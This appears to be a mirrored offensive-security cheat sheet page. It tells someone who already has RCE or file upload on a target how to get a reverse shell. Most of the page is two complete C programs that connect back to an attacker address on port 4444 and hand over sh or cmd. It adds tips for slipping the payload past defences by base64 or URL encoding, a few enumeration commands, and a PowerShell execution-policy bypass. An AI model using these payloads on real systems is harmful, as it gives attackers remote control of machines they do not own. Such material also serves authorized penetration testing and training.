mirror of
https://github.com/Jieyab89/OSINT-Cheat-sheet.git
synced 2025-12-12 07:40:57 -08:00
2.5 KiB
2.5 KiB
TIPS
If you have obtained a vulnerability such as RCE, file upload or something else, you can use the script below to spawn a shell or backconnect revershell. If the shell does not run see below
- Make sure the target has internet access (internet access opened)
- Try changing the port to a larger one such as 8080, 8888, etc.
- Encode your script using base64 and then decode it
- Encode your script using url encode
- Check the compiler
C script spawning shell
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 4444;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("<IP>");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"sh", NULL};
execvp("sh", argv);
return 0;
}
C spawning cmd
#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int main(void){
int port = 4444;
struct sockaddr_in revsockaddr;
int sockt = socket(AF_INET, SOCK_STREAM, 0);
revsockaddr.sin_family = AF_INET;
revsockaddr.sin_port = htons(port);
revsockaddr.sin_addr.s_addr = inet_addr("0.0.0.0");
connect(sockt, (struct sockaddr *) &revsockaddr,
sizeof(revsockaddr));
dup2(sockt, 0);
dup2(sockt, 1);
dup2(sockt, 2);
char * const argv[] = {"cmd", NULL};
execvp("cmd", argv);
return 0;
}
Enum about the jail
echo $SHELL
echo $PATH
env
export
pwd
*Windows Powershell Pro Tips
- If you was gett the shell, change to powershell, you can run
powershell -ep bypass
Source